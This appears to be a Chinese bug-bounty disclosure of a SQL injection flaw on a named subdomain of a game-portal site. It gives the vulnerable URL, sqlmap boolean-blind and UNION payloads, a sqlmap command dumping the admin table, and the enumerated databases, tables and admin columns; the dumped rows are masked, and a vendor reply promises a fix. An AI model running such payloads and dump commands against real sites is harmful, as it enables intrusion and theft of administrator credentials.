口袋巴士某分站存在SQL注入漏洞涉及全站数据

注入url：http://vs.ptbus.com/zblb_1/?name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: name (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9' AND 5114=5114 AND 'tylJ'='tylJ

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b7a71,0x6e596a5a4c7158776154674e666950624f66725779724a7876764f6f59746f6a5156585355484643,0x716b6a7171),NULL,NULL-- -

---

[11:34:23] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.20, PHP 5.2.17

back-end DBMS: MySQL 5

[11:34:23] [INFO] fetching database names

[11:34:23] [INFO] the SQL query used returns 3 entries

[11:34:23] [INFO] resumed: information_schema

[11:34:23] [INFO] resumed: ptbus_www

[11:34:23] [INFO] resumed: test

available databases [3]:

[*] information_schema

[*] ptbus_www

[*] test

dede开发的可惜没找到后台！

Database: ptbus_www

[130 tables]

+------------------------+

| dede_accelerate |

| dede_active |

| dede_addonactive |

| dede_addonarticle |

| dede_addonbbsheader |

| dede_addondb |

| dede_addondownload |

| dede_addonfactory |

| dede_addonimages |

| dede_addoninfos |

| dede_addonrank |

| dede_addonrecodeurl |

| dede_addonrelation |

| dede_addonshop |

| dede_addonsoft |

| dede_addonspec |

| dede_addonspecial |

| dede_addonsubject |

| dede_addontemplet |

| dede_addonvideo |

| dede_admin |

| dede_admintype |

| dede_advancedsearch |

| dede_apihotrank |

| dede_arcatt |

| dede_arccache |

| dede_arcfreecache |

| dede_archives |

| dede_arcmulti |

| dede_arcrank |

| dede_arctiny |

| dede_arctype |

| dede_area |

| dede_channeltype |

| dede_co_htmls |

| dede_co_mediaurls |

| dede_co_note |

| dede_co_onepage |

| dede_co_urls |

| dede_cypdbm |

| dede_diyforms |

| dede_dl_log |

| dede_downloads |

| dede_erradd |

| dede_factype |

| dede_feedback |

| dede_flink |

| dede_flinktype |

| dede_freelist |

| dede_gamecard |

| dede_hit |

| dede_homepageset |

| dede_hotapirank |

| dede_keywords |

| dede_log |

| dede_lottery |

| dede_lottery_log |

| dede_lottery_msg |

| dede_makehomelog |

| dede_member |

| dede_member_company |

| dede_member_feed |

| dede_member_flink |

| dede_member_friends |

| dede_member_group |

| dede_member_guestbook |

| dede_member_model |

| dede_member_msg |

| dede_member_operation |

| dede_member_person |

| dede_member_pms |

| dede_member_snsmsg |

| dede_member_space |

| dede_member_stow |

| dede_member_stowtype |

| dede_member_tj |

| dede_member_type |

| dede_member_vhistory |

| dede_mobile |

| dede_moneycard_record |

| dede_moneycard_type |

| dede_mtypes |

| dede_multiserv_config |

| dede_myad |

| dede_myadtype |

| dede_mytag |

| dede_ol_database |

| dede_ol_dataservice |

| dede_ol_datatesttime |

| dede_path |

| dede_payment |

| dede_plus |

| dede_proposal |

| dede_purview |

| dede_pwd_tmp |

| dede_raffle |

| dede_raffle_vote |

| dede_ratings |

| dede_remoteinc |

| dede_remoteinc_extends |

| dede_scores |

| dede_search_cache |

| dede_search_keywords |

| dede_sgpage |

| dede_shops_delivery |

| dede_shops_orders |

| dede_shops_products |

| dede_shops_userinfo |

| dede_softconfig |

| dede_sphinx |

| dede_stepselect |

| dede_sys_enum |

| dede_sys_module |

| dede_sys_set |

| dede_sys_task |

| dede_sysconfig |

| dede_tagex |

| dede_tagindex |

| dede_taglink |

| dede_taglist |

| dede_temp |

| dede_templet_version |

| dede_tgarctype |

| dede_tgstype |

| dede_uploads |

| dede_verifies |

| dede_vote |

| dede_vote_member |

| dede_wallpaper |

| dede_weixin |

+------------------------+

[11:34:46] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/vs.ptbus.com'

--------------------------------------------------------------------------------

C:/Python27/slqmap>sqlmap.py -u "http://vs.ptbus.com/zblb_1/?name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9" -D "ptbus_www" -T "dede_admin" --dump

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20160114-0b4b}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:40:27

[11:40:28] [INFO] resuming back-end DBMS 'mysql'

[11:40:28] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: name (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9' AND 5114=5114 AND 'tylJ'='tylJ

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: name=%E5%B0%8F%E6%89%8B%E9%81%AE%E5%A4%A9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b7a71,0x6e596a5a4c7158776154674e666950624f66725779724a7876764f6f59746f6a5156585355484643,0x716b6a7171),NULL,NULL-- -

---

[11:40:28] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.20, PHP 5.2.17

back-end DBMS: MySQL 5

[11:40:28] [INFO] fetching columns for table 'dede_admin' in database 'ptbus_www'

[11:40:28] [INFO] the SQL query used returns 10 entries

[11:40:28] [INFO] resumed: "id","int(10) unsigned"

[11:40:28] [INFO] resumed: "usertype","float unsigned"

[11:40:28] [INFO] resumed: "userid","char(30)"

[11:40:28] [INFO] resumed: "pwd","char(32)"

[11:40:28] [INFO] resumed: "uname","char(20)"

[11:40:28] [INFO] resumed: "tname","char(30)"

[11:40:28] [INFO] resumed: "email","char(30)"

[11:40:28] [INFO] resumed: "typeid","text"

[11:40:28] [INFO] resumed: "logintime","int(10) unsigned"

[11:40:28] [INFO] resumed: "loginip","varchar(20)"

[11:40:28] [INFO] fetching entries for table 'dede_admin' in database 'ptbus_www'

[11:40:28] [INFO] the SQL query used returns 78 entries

[11:40:28] [INFO] analyzing table dump for possible password hashes

Database: ptbus_www

Table: dede_admin

[78 entries]

****

****

[11:40:29] [INFO] table 'ptbus_www.dede_admin' dumped to CSV file 'C:/Users/Administrator/.sqlmap/output/vs.ptbus.com/dump/ptbus_www/dede_admin.csv'

[11:40:29] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/vs.ptbus.com'

C:/Python27/slqmap>

过滤参数

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-21 09:29

厂商回复：

感谢洞主对完美世界的关注，我们将尽快修补。

最新状态：

暂无